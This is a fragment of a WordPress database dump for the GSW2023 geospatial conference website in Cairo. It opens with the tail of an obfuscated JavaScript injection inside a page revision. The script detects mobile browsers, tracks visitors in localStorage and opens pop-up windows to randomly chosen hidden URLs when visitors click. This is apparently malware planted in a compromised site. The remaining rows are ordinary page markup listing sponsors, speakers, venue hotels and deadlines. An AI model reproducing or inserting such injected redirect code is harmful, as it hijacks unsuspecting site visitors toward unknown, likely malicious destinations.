)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-03 11:44:52','2023-06-03 11:44:52','',3066,'https://gsw2023.com/?p=4627',0,'revision','',0),
(4628,1,'2023-06-03 11:51:51','2023-06-03 11:51:51','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609238799{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n<a href=\"https://www.giscon.de/en/\"><img class=\"aligncenter wp-image-4597 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"300\" height=\"222\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\r\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]\r\n\r\n[vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"]\r\n[vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n&nbsp;\r\n<h3></h3>\r\n[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1685791591251{margin-top: 260px !important;}\"]\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2271\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png\" alt=\"\" width=\"105\" height=\"104\" /></p>\r\n\r\n<div class=\"aio-icon-header\">\r\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong>Prof. Ismail AbdelGhafar</strong></span></h4>\r\n</div>\r\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\r\n<p style=\"text-align: center;\"><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></p>\r\n\r\n</div>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791357227{margin-top: 220px !important;}\"]\r\n<div class=\"aio-icon-header\">\r\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong><img class=\"alignnone wp-image-4613\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/dr-alaa.jpg\" alt=\"\" width=\"80\" height=\"106\" /></strong></span></h4>\r\n<div class=\"aio-icon-header\">\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Prof. Dr. Alaa A. Abdelbary</strong></span></h4>\r\n</div>\r\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\r\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Chairman of the local organizing committee GSW2023, Egypt</strong></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Vice President for Postgraduates Studies and Scientific Research</strong></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Arab Academy for Science, Technology&amp; Maritime Transport</strong></span></p>\r\n\r\n</div>\r\n</div>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791546373{margin-top: 220px !important;}\"]\r\n<div class=\"aio-icon-header\">\r\n<div class=\"aio-icon-header\">\r\n<div class=\"aio-icon-header\">\r\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><img class=\"alignnone wp-image-2272\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg\" alt=\"\" width=\"106\" height=\"106\" /></span></h4>\r\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\">Prof. Naser El-Sheimy</span></h4>\r\n</div>\r\n</div>\r\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\r\n<p style=\"text-align: center;\"><strong>Geospatial Week Director ,The University of Calgary</strong></p>\r\n\r\n</div>\r\n</div>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n\r\n[vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]\r\n<ul>\r\n 	<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\r\n</ul>\r\n[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]\r\n<ul>\r\n 	<li><strong>Full paper Author notification: June 15, 2023</strong></li>\r\n</ul>\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]\r\n<ul>\r\n 	<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\r\n</ul>\r\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\r\n<ul>\r\n 	<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\r\n 	<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\r\n 	<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" 